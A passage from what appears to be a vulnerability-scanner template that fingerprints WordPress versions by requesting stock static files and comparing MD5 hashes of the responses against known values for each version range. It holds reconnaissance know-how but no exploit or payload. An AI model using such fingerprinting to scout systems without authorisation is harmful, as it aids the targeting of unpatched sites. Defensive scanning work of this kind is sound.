method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_twisted.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"62abd50ca92eb2381a7c60e351f64c46\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"56d63d335faf2b9b705216f77fc84084\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"4cbed7765b3fe5e92b2a389ed73bc9f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_arrow.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"bfcab5090b1280bbe495dbead4d2281f\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"d9078df58bf1de76746241bd92ac2444\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"2009c9ff4a3cd667fecc6f9d08393a78\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_eek.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"a6c65fa6ff738ef6c46a4e80a65f7aa0\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"60666400eabb78b17a76039bdcd4dab0\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9c2f4920bfb18a78f129f12822f495e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/blank.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"48bb2baaf4353109f7c2665d96aa390b\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"f11f0a834146497c0b9b12fb1027fec7\" == md5(body))" - - type: dsl - name: 2.6 - 3.8.35 - dsl: - - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"c9fd1cfbca9f678ed068ed6b4bbeb666\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/ID3/readme.txt" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"9396dfe1c69c938eb17f564c4e5bab18\" == md5(body))" - - type: dsl - name: 3.6 - 4.0.32 - dsl: - - "(\"fc517870758d5fb84026d45e9aadbd2d\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"dda3f6ff7ad91e65d1a7d1a56b3538e3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/ID3/license.txt" - matchers: - - type: dsl - name: 4.3 - 5.2.9 - dsl: - - "(\"35d98aadf8f7cc6851336651f7a66b98\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"361298a1f00ff6d56a51e0c3d2233194\" == md5(body))" - - type: dsl - name: 3.6 - 4.0.32 - dsl: - - "(\"9fccf5d6799a9d78e7f6a742b79587e3\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"47d8905625e6505f1117fa0ba8d5b7af\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.min.js" - matchers: - - type: dsl - name: 3.6 - 5.2.9 - dsl: - - "(\"ff2db8dbf145ce47f31781eef33e764a\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"dc7e27d84eafb6b436f9f224e8ce8153\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"7271d32a58986771019f4fa31328cd88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/position.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"1c4a13edec1958817e83433aeaa42f62\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"9396d719a4eadde27896ce30327a3a89\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7d94d07b3a1c9f704b76120cc16874fb\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"586bc1619fe2aa146bef070f140fd386\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"e7346f4d2945cebe75bd53cf232f927e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/widget.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"8cf7f36bbd79bc0664b6113f7a7837fe\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"0bb0af0869341cca0236ba99d4ea092f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"02e635faa37ecc25ee5d630d888cf53c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b369c6d4df45a622294874f96a746fb5\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"00dedd56324da186973a3b2cc5e8023c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.min.js" - matchers: - - type: dsl - name: 4.6 - 4.9.2 - dsl: - - "(\"264563e94e2d16b1066bd413ebc592de\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f7f63370324b974e93d8ff15c6d35765\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.2.9 - dsl: - - "(\"5fb749f8adce337f9f303136821bdf5f\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"ace20386f3337c475ee213634b5422db\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"8607e87dcbb351d067d1a54485e8a357\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"564cd5d11909d4675327b6f71fa09269\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"011e67d9a7ce51e04da304564eab4eee\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"273bde000e25c739c22659cba8293fcc\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"b88b9554a163ab6eabae776b24d0d2b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js" - matchers: - - type: dsl - name: 3.9 - 5.2.9 - dsl: - - "(\"eafbb1478981e337981d287474e240b8\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"514f31ff2f073c993e252206da58dce0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js" - matchers: - - type: dsl - name: 4.4 - 5.2.9 - dsl: - - "(\"04fb37608ef94f9a747901b2f98b4fce\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"b229462e6a542696fbf6bd4917c9074f\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"86dbf10dbce4709d79872dd5ce2219e6\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"e692a8504899e953b1e96c8daaecb310\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.9 - dsl: - - "(\"a92e4569e92450776f18e0bb6ddae1b1\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"91368350377a702b925dbcf6fa80cc8d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"1842882ca7cdf96e7a1bf3e1d55691d2\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"8291a8caa3672971dc61b332ecc437c3\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"091dd1893b9d7916fd4111200ac21e3c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/xit-2x.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/xit.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"6a03660e0544b85fc84d4de174c28741\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-video.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"abaac3dfd81fbf72e578f13451eae7d0\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"91c6cc0f67412e41acf7bdc63d2c4ee0\" == md5(body))" - - type: dsl - name: 3.0 - 3.8.35 - dsl: - - "(\"ba34507befaa9b9b06e96c6c846bab69\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"bc7efebd002f34e8e6c30769ff417bdd\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"c2d206df3efdc0db758b8065ad77f04a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-other.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"8bc6b46bc70c7c1918dce62c4fe3229c\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"1f8f339019a4dea621a161a23743fa28\" == md5(body))" - - type: dsl - name: 3.0 - 3.8.35 - dsl: - - "(\"94e0e87b48fc4c7830164d48cfb41e7f\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"22dd6f85320fb13797ab7e3ff890515b\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"a55126545e825d4242990e670227f9c3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-image.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"7ea2c9c157c38edb40b1ce62d572d5b3\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"62a84ad3d4d2921ecb1c0f86d8f0f790\" == md5(body))" - - type: dsl - name: 3.0 - 3.8.35 - dsl: - - "(\"538670efb6e78fcfdd4662623be4e675\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"0357183d4a361456b8b121209af5c608\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"1df8ccf3a8b6f86dbe09278ae8e60141\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/bubble_bg.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"3d2cb3f7baa628c9e51a326356e72038\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"49ce47d14ff136019b315b72fa1e28e9\" == md5(body))" - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"b78fd5758e486128cf448c5973ca6ee4\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"fa7ecf673cc487f349a0c1ac1f1eae30\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/sort.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"2e8acb8dee99bfbcb61bd46c486a995d\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"8e2fbe1407bfc897c457aa1bd3e24e1a\" == md5(body))" - - type: dsl - name: 3.1 - 3.8.35 - dsl: - - "(\"2bf510e2b04bacc1677a7a04dc318abf\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"fba0b2ac81a0edbd2aa220aa92dacf33\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-music.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"eff55df37f325c5aae2f02e4d913de95\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"91c40146718f73144dde29494a6f9c3c\" == md5(body))" - - type: dsl - name: 3.0 - 3.8.35 - dsl: - - "(\"423f910219d605ddd355681816a08b45\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"0fec8f86c9c036a2ecf54dbb66a63133\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"345e0f26246fc3e8a00b75662610f498\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/date-button.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"979d8e2e08aada49819556950ec48ff6\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"cd3b134e8fd47881f1841a857ebd97f0\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"946eeed3973aa98d1833849d9a4bf8da\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"6785862d31a929183751cfa86cddfdca\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"762130cf9d24c70a2de6bdae4ce5cc54\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/date-button-2x.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"2952932c246bf9828429361643a8bb63\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"253b7509a7739e2f5338a29f76bea171\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"5d78ee005f9f25fad855bef396a5e822\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"c28b3fbea9a861b430fdd7394a511a96\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.min.js" - matchers: - - type: dsl - name: 4.3 - 5.2.9 - dsl: - - "(\"700a94e9934c7b419dfa6790b1dc4a35\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1524661e32c6718ba9ca81314b5272f8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.css" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"957da4b922728f725cb6369cc9f28957\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"8831e7c4aa4ca8eff635fa01d1210aa1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.css" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"c4eb4f7315c64a37361986e2e5d3314e\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9d0ee441d256fd74d046c6a3b6188996\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"3fefcdeb28220a3107a61ca3af3070f9\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"52bec302d465dd23422d9986af7bfa3a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/moxie.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"68dec65b1e80b2b66994f4700762b65c\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"5b6e97b8f1fc2f1cef763570a8b578da\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"47d38d462d5fa882a92dbd2b54d5d747\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"257fc7bf0ae0ea044d61aa63b6c06f7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js" - matchers: - - type: dsl - name: 4.3 - 4.9.4 - dsl: - - "(\"25f42e049e65ee16d442799755724025\" == md5(body))" - - type: dsl - name: 3.7 - 4.2.29 - dsl: - - "(\"0030d4ba4c429d776d23c2e37775873a\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.2.9 - dsl: - - "(\"959b49d52e2ff3abd7b9e48440679dff\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"a12d313609d2dfa8c9f7b1db8896ac29\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_cry.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"453e7a3f8bbb417008f06d576c41d060\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"5da5f07ede5730e210dafae8d97f1f62\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"e6d886c8d4923e8242445dcda52e4395\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"8f2b60c5ae6490575df6a4d5cbf09768\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_evil.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"63bf101bd3d4f7564d3cf31822218d2e\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2423931c62f57d3c2976801421abbb05\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"4cc062e08ae0266dc7f083d3bb9a55f8\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"03d05e8df44d8f3eca070e7a9302e5f8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_lol.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"d4f04dc65a387ca9b8c0f22ca8c0ec8c\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"fe9ded95d13eaf65b383cfb6b7798108\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"c9d90ece68db8c95c73fa1d5b80dcc12\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"6ec199f5e3ff3ad1b7268a83f9d628bc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_rolleyes.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"afc8bbc65fcbd2b82a3e2c1ab41a216a\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"89077d93d01d6f71dc21674b9f545d17\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"2858c5350a62df8cb2ca03553b09a66e\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"5f3587060ecb103649bdd81498c49445\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpspin-2x.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"450b52bd860e667a0fa3c00b82b58a18\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/bubble_bg-2x.gif" - matchers: - - type: dsl - name: 3.9 - 4.9.16 - dsl: - - "(\"16523d5bf9efd8ca3b92e7631edfc513\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"1a76a1434d972ee849b119e69cd3f2ba\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"5bcd62dbf3804ccafc509e076fc072bb\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"cfac1d71069a6a99198c0a8a1358c23c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wpspin_light-2x.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"450b52bd860e667a0fa3c00b82b58a18\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-embed-template.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"433386de4a64b9ca6d74e14756bdaff6\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"c330e071f58f3c8aa254c02f11906bff\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4aa156587449104f531647e71df6da12\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"5ea02d6d347946e4d2344e336da3cf8d\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"24bd34d51376d78109ab3bcb61b66621\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"eb76120347829c4ba3576665b2d871f0\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"74ca084f6791af45527be4b531909512\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"ad088d44c475a26d541c1b3988a8a274\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"2b5b1702953af1d79db2e16f477fc709\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"ea958276b7de454bd3c2873f0dc47e5f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js" - matchers: - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"bf3a6ad4463d6f0d2bc861cbcb05c799\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"1209a4457fcf2627d2a93bc840fa6b5a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/backbone.js" - matchers: - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"8a8d829617513f36185a0ab055d088ec\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"222432686a333255fd0f9b8fa4d4e713\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"c6cc2ce4842cf34494b20855418ec7ee\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"bb7500b816de10f3ada065bb1ff9c53b\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"7ceb852c73b74dc1b5f5f015be95506d\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"cdabff9760b3ee59012f88238165a5d3\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"d1ce7b53e26d646fdb640f194bcbc873\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.min.js" - matchers: - - type: dsl - name: 3.7 - 4.8.15 - dsl: - - "(\"dbc3808473def00fce45fe564dc72dcb\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"4534fa47fab86ef0aca5345e30ddf509\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"26737b44eebb5d66ee9af634a284b602\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"60ef76775035959651341315c9d82129\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/xfn.js" - matchers: - - type: dsl - name: 3.8 - 4.9.5 - dsl: - - "(\"e2d6eecbd774af1e2bb1a16ec117286b\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"2c3b9f9d90fbe685791b2fc0db9e6e03\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"ab6a19cf026e7befa133ff49e4d27e66\" == md5(body))" - - type: dsl - name: 2.3 - 2.7.1 - dsl: - - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"8de5f12403af4eb425b9ae18dad17266\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"ad6873245a6fbaea4904dbf8b7dd6a17\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"f715e9cd03d570820eb81c2990a2b70b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpspin.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_redface.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"1c6d8b101c821641f983175221346112\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"ddeac27dd6f38bce798023a25a66010a\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"00b44044422c6becd1a5c406da47c1bd\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"ab6dbc90184c83abb8d6568678656813\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"bf8fd5fe9c1555cbd7ed45f9a0a81bd3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wpspin_light.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" - - type: dsl - name: 2.8 - 3.8.35 - dsl: - - 